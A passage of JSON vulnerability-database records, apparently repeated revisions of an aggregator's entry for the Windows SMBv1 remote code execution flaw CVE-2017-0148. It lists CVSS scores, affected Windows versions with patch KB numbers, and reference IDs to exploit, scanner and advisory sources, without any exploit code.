["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:34", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T12:52:00", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB3177186", "KB3212646", "KB4012598", "KB4012606", "KB4012214", "KB4013429", "KB3210721", "KB4012215", "KB3213986", "KB4013198", "KB3205401", "KB3210720", "KB4012212", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:52:00", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T15:08:23", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 